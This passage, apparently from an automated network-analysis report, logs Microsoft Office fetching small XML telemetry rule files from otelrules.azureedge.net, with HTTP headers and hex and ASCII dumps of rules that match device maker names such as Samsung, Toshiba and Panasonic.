                                                  2024-10-13 17:34:21 UTC419INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 53 73 5d 5b 41 61 5d 5b 4d 6d 5d 5b 53 73 5d 5b 55 75 5d 5b 4e 6e 5d 5b 47 67 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d
                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120633" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120631" /> <SR T="2" R="([Ss][Aa][Mm][Ss][Uu][Nn][Gg])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O=


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  61192.168.2.44982613.107.246.45443
                                                  TimestampBytes transferredDirectionData
                                                  2024-10-13 17:34:21 UTC192OUTGET /rules/rule120634v0s19.xml HTTP/1.1
                                                  Connection: Keep-Alive
                                                  Accept-Encoding: gzip
                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                  Host: otelrules.azureedge.net
                                                  2024-10-13 17:34:21 UTC470INHTTP/1.1 200 OK
                                                  Date: Sun, 13 Oct 2024 17:34:21 GMT
                                                  Content-Type: text/xml
                                                  Content-Length: 494
                                                  Connection: close
                                                  Cache-Control: public, max-age=604800, immutable
                                                  Last-Modified: Tue, 09 Apr 2024 00:26:38 GMT
                                                  ETag: "0x8DC582BB8972972"
                                                  x-ms-request-id: 1507c9f1-d01e-007a-72eb-1af38c000000
                                                  x-ms-version: 2018-03-28
                                                  x-azure-ref: 20241013T173421Z-17db6f7c8cfnqpbkckdefmqa44000000055000000000d6q0
                                                  x-fd-int-roxy-purgeid: 0
                                                  X-Cache: TCP_HIT
                                                  Accept-Ranges: bytes
                                                  2024-10-13 17:34:21 UTC494INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120634" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120633" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  62192.168.2.44982413.107.246.45443
                                                  TimestampBytes transferredDirectionData
                                                  2024-10-13 17:34:21 UTC192OUTGET /rules/rule120632v0s19.xml HTTP/1.1
                                                  Connection: Keep-Alive
                                                  Accept-Encoding: gzip
                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                  Host: otelrules.azureedge.net
                                                  2024-10-13 17:34:21 UTC470INHTTP/1.1 200 OK
                                                  Date: Sun, 13 Oct 2024 17:34:21 GMT
                                                  Content-Type: text/xml
                                                  Content-Length: 471
                                                  Connection: close
                                                  Cache-Control: public, max-age=604800, immutable
                                                  Last-Modified: Tue, 09 Apr 2024 00:26:33 GMT
                                                  ETag: "0x8DC582BB5815C4C"
                                                  x-ms-request-id: 9dc98f41-601e-0097-4647-1cf33a000000
                                                  x-ms-version: 2018-03-28
                                                  x-azure-ref: 20241013T173421Z-17db6f7c8cf9c22xp43k2gbqvn00000002v000000000939k
                                                  x-fd-int-roxy-purgeid: 0
                                                  X-Cache: TCP_HIT
                                                  Accept-Ranges: bytes
                                                  2024-10-13 17:34:21 UTC471INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120632" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120631" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  63192.168.2.44982713.107.246.45443
                                                  TimestampBytes transferredDirectionData
                                                  2024-10-13 17:34:22 UTC192OUTGET /rules/rule120635v0s19.xml HTTP/1.1
                                                  Connection: Keep-Alive
                                                  Accept-Encoding: gzip
                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                  Host: otelrules.azureedge.net
                                                  2024-10-13 17:34:22 UTC470INHTTP/1.1 200 OK
                                                  Date: Sun, 13 Oct 2024 17:34:22 GMT
                                                  Content-Type: text/xml
                                                  Content-Length: 420
                                                  Connection: close
                                                  Cache-Control: public, max-age=604800, immutable
                                                  Last-Modified: Tue, 09 Apr 2024 00:25:53 GMT
                                                  ETag: "0x8DC582B9DAE3EC0"
                                                  x-ms-request-id: 1734d22f-801e-0067-0a1a-1cfe30000000
                                                  x-ms-version: 2018-03-28
                                                  x-azure-ref: 20241013T173422Z-17db6f7c8cfvtw4hh2496wp8p800000003hg00000000fbhm
                                                  x-fd-int-roxy-purgeid: 0
                                                  X-Cache: TCP_HIT
                                                  Accept-Ranges: bytes
                                                  2024-10-13 17:34:22 UTC420INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 54 74 5d 5b 4f 6f 5d 5b 53 73 5d 5b 48 68 5d 5b 49 69 5d 5b 42 62 5d 5b 41 61 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f
                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120635" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120633" /> <SR T="2" R="^([Tt][Oo][Ss][Hh][Ii][Bb][Aa])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  64192.168.2.44983013.107.246.45443
                                                  TimestampBytes transferredDirectionData
                                                  2024-10-13 17:34:22 UTC192OUTGET /rules/rule120638v0s19.xml HTTP/1.1
                                                  Connection: Keep-Alive
                                                  Accept-Encoding: gzip
                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                  Host: otelrules.azureedge.net
                                                  2024-10-13 17:34:22 UTC470INHTTP/1.1 200 OK
                                                  Date: Sun, 13 Oct 2024 17:34:22 GMT
                                                  Content-Type: text/xml
                                                  Content-Length: 486
                                                  Connection: close
                                                  Cache-Control: public, max-age=604800, immutable
                                                  Last-Modified: Tue, 09 Apr 2024 00:25:35 GMT
                                                  ETag: "0x8DC582B92FCB436"
                                                  x-ms-request-id: 4ea1e91c-d01e-0066-2741-1cea17000000
                                                  x-ms-version: 2018-03-28
                                                  x-azure-ref: 20241013T173422Z-17db6f7c8cfmhggkx889x958tc00000002dg0000000073ah
                                                  x-fd-int-roxy-purgeid: 0
                                                  X-Cache: TCP_HIT
                                                  Accept-Ranges: bytes
                                                  2024-10-13 17:34:22 UTC486INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120638" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120637" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  65192.168.2.44982813.107.246.45443
                                                  TimestampBytes transferredDirectionData
                                                  2024-10-13 17:34:22 UTC192OUTGET /rules/rule120636v0s19.xml HTTP/1.1
                                                  Connection: Keep-Alive
                                                  Accept-Encoding: gzip
                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                  Host: otelrules.azureedge.net
                                                  2024-10-13 17:34:22 UTC470INHTTP/1.1 200 OK
                                                  Date: Sun, 13 Oct 2024 17:34:22 GMT
                                                  Content-Type: text/xml
                                                  Content-Length: 472
                                                  Connection: close
                                                  Cache-Control: public, max-age=604800, immutable
                                                  Last-Modified: Tue, 09 Apr 2024 00:25:52 GMT
                                                  ETag: "0x8DC582B9D43097E"
                                                  x-ms-request-id: 1375d82d-b01e-0084-53a9-1cd736000000
                                                  x-ms-version: 2018-03-28
                                                  x-azure-ref: 20241013T173422Z-17db6f7c8cf6f7vv3recfp4a6w000000027g00000000arm8
                                                  x-fd-int-roxy-purgeid: 0
                                                  X-Cache: TCP_HIT
                                                  Accept-Ranges: bytes
                                                  2024-10-13 17:34:22 UTC472INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120636" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120635" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  66192.168.2.44983113.107.246.45443
                                                  TimestampBytes transferredDirectionData
                                                  2024-10-13 17:34:22 UTC192OUTGET /rules/rule120639v0s19.xml HTTP/1.1
                                                  Connection: Keep-Alive
                                                  Accept-Encoding: gzip
                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                  Host: otelrules.azureedge.net
                                                  2024-10-13 17:34:22 UTC470INHTTP/1.1 200 OK
                                                  Date: Sun, 13 Oct 2024 17:34:22 GMT
                                                  Content-Type: text/xml
                                                  Content-Length: 423
                                                  Connection: close
                                                  Cache-Control: public, max-age=604800, immutable
                                                  Last-Modified: Tue, 09 Apr 2024 00:26:36 GMT
                                                  ETag: "0x8DC582BB7564CE8"
                                                  x-ms-request-id: f4abfb5c-001e-00a2-33e5-1ad4d5000000
                                                  x-ms-version: 2018-03-28
                                                  x-azure-ref: 20241013T173422Z-17db6f7c8cfnqpbkckdefmqa44000000059g000000003eaf
                                                  x-fd-int-roxy-purgeid: 0
                                                  X-Cache: TCP_HIT
                                                  Accept-Ranges: bytes
                                                  2024-10-13 17:34:22 UTC423INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 44 64 5d 5b 59 79 5d 5b 4e 6e 5d 5b 41 61 5d 5b 42 62 5d 5b 4f 6f 5d 5b 4f 6f 5d 5b 4b 6b 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30
                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120639" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120637" /> <SR T="2" R="([Dd][Yy][Nn][Aa][Bb][Oo][Oo][Kk])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  67192.168.2.44982913.107.246.45443
                                                  TimestampBytes transferredDirectionData
                                                  2024-10-13 17:34:22 UTC192OUTGET /rules/rule120637v0s19.xml HTTP/1.1
                                                  Connection: Keep-Alive
                                                  Accept-Encoding: gzip
                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                  Host: otelrules.azureedge.net
                                                  2024-10-13 17:34:22 UTC470INHTTP/1.1 200 OK
                                                  Date: Sun, 13 Oct 2024 17:34:22 GMT
                                                  Content-Type: text/xml
                                                  Content-Length: 427
                                                  Connection: close
                                                  Cache-Control: public, max-age=604800, immutable
                                                  Last-Modified: Tue, 09 Apr 2024 00:26:12 GMT
                                                  ETag: "0x8DC582BA909FA21"
                                                  x-ms-request-id: 0a475807-001e-00a2-0116-1cd4d5000000
                                                  x-ms-version: 2018-03-28
                                                  x-azure-ref: 20241013T173422Z-17db6f7c8cf9wwz8ehu7c5p33g00000002h0000000005g99
                                                  x-fd-int-roxy-purgeid: 0
                                                  X-Cache: TCP_HIT
                                                  Accept-Ranges: bytes
                                                  2024-10-13 17:34:22 UTC427INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 50 70 5d 5b 41 61 5d 5b 4e 6e 5d 5b 41 61 5d 5b 53 73 5d 5b 4f 6f 5d 5b 4e 6e 5d 5b 49 69 5d 5b 43 63 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20
                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120637" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120635" /> <SR T="2" R="([Pp][Aa][Nn][Aa][Ss][Oo][Nn][Ii][Cc])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W"


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  68192.168.2.44983213.107.246.45443
                                                  TimestampBytes transferredDirectionData
                                                  2024-10-13 17:34:22 UTC192OUTGET /rules/rule120640v0s19.xml HTTP/1.1
                                                  Connection: Keep-Alive
                                                  Accept-Encoding: gzip
                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                  Host: otelrules.azureedge.net
                                                  2024-10-13 17:34:23 UTC470INHTTP/1.1 200 OK
                                                  Date: Sun, 13 Oct 2024 17:34:22 GMT
                                                  Content-Type: text/xml
                                                  Content-Length: 478
                                                  Connection: close
                                                  Cache-Control: public, max-age=604800, immutable
                                                  Last-Modified: Tue, 09 Apr 2024 00:25:48 GMT
                                                  ETag: "0x8DC582B9B233827"
                                                  x-ms-request-id: 49fa3939-001e-0017-20cd-1a0c3c000000
                                                  x-ms-version: 2018-03-28
                                                  x-azure-ref: 20241013T173422Z-17db6f7c8cfp6mfve0htepzbps00000004pg000000005ucp
                                                  x-fd-int-roxy-purgeid: 0
                                                  X-Cache: TCP_HIT
                                                  Accept-Ranges: bytes
                                                  2024-10-13 17:34:23 UTC478INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120640" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120639" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  69192.168.2.44983413.107.246.45443
                                                  TimestampBytes transferredDirectionData
                                                  2024-10-13 17:34:23 UTC192OUTGET /rules/rule120642v0s19.xml HTTP/1.1
                                                  Connection: Keep-Alive
                                                  Accept-Encoding: gzip
                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                  Host: otelrules.azureedge.net
                                                  2024-10-13 17:34:23 UTC470INHTTP/1.1 200 OK
                                                  Date: Sun, 13 Oct 2024 17:34:23 GMT
                                                  Content-Type: text/xml
                                                  Content-Length: 468
                                                  Connection: close
                                                  Cache-Control: public, max-age=604800, immutable
                                                  Last-Modified: Tue, 09 Apr 2024 00:26:24 GMT
                                                  ETag: "0x8DC582BB046B576"
                                                  x-ms-request-id: 38f28e88-001e-0046-4a22-1bda4b000000
                                                  x-ms-version: 2018-03-28
                                                  x-azure-ref: 20241013T173423Z-17db6f7c8cfnqpbkckdefmqa440000000590000000004hb6
                                                  x-fd-int-roxy-purgeid: 0
                                                  X-Cache: TCP_HIT
                                                  Accept-Ranges: bytes
                                                  2024-10-13 17:34:23 UTC468INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120642" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120641" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  70192.168.2.44983513.107.246.45443
                                                  TimestampBytes transferredDirectionData
                                                  2024-10-13 17:34:23 UTC192OUTGET /rules/rule120643v0s19.xml HTTP/1.1
                                                  Connection: Keep-Alive
                                                  Accept-Encoding: gzip
                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                  Host: otelrules.azureedge.net
                                                  2024-10-13 17:34:23 UTC470INHTTP/1.1 200 OK
                                                  Date: Sun, 13 Oct 2024 17:34:23 GMT
                                                  Content-Type: text/xml
                                                  Content-Length: 400
                                                  Connection: close
                                                  Cache-Control: public, max-age=604800, immutable
                                                  Last-Modified: Tue, 09 Apr 2024 00:26:28 GMT
                                                  ETag: "0x8DC582BB2D62837"
                                                  x-ms-request-id: e9bc8845-c01e-008d-06d9-1a2eec000000
                                                  x-ms-version: 2018-03-28
                                                  x-azure-ref: 20241013T173423Z-17db6f7c8cfgqlr45m385mnngs00000003t0000000007zcy
                                                  x-fd-int-roxy-purgeid: 0
                                                  X-Cache: TCP_HIT
                                                  Accept-Ranges: bytes
                                                  2024-10-13 17:34:23 UTC400INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 4c 6c 5d 5b 47 67 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20 20 3c 53 20 54 3d 22
                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120643" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120641" /> <SR T="2" R="^([Ll][Gg])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true"> <S T="


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  71192.168.2.44983313.107.246.45443
                                                  TimestampBytes transferredDirectionData
                                                  2024-10-13 17:34:23 UTC192OUTGET /rules/rule120641v0s19.xml HTTP/1.1
                                                  Connection: Keep-Alive
                                                  Accept-Encoding: gzip
                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                  Host: otelrules.azureedge.net
                                                  2024-10-13 17:34:23 UTC470INHTTP/1.1 200 OK
                                                  Date: Sun, 13 Oct 2024 17:34:23 GMT
                                                  Content-Type: text/xml
                                                  Content-Length: 404
                                                  Connection: close
                                                  Cache-Control: public, max-age=604800, immutable
                                                  Last-Modified: Tue, 09 Apr 2024 00:25:39 GMT
                                                  ETag: "0x8DC582B95C61A3C"
                                                  x-ms-request-id: e8d3a0af-c01e-0014-0c1c-1ca6a3000000
                                                  x-ms-version: 2018-03-28
                                                  x-azure-ref: 20241013T173423Z-17db6f7c8cfpm9w8b1ybgtytds000000030g00000000h35z
                                                  x-fd-int-roxy-purgeid: 0
                                                  X-Cache: TCP_HIT
                                                  Accept-Ranges: bytes
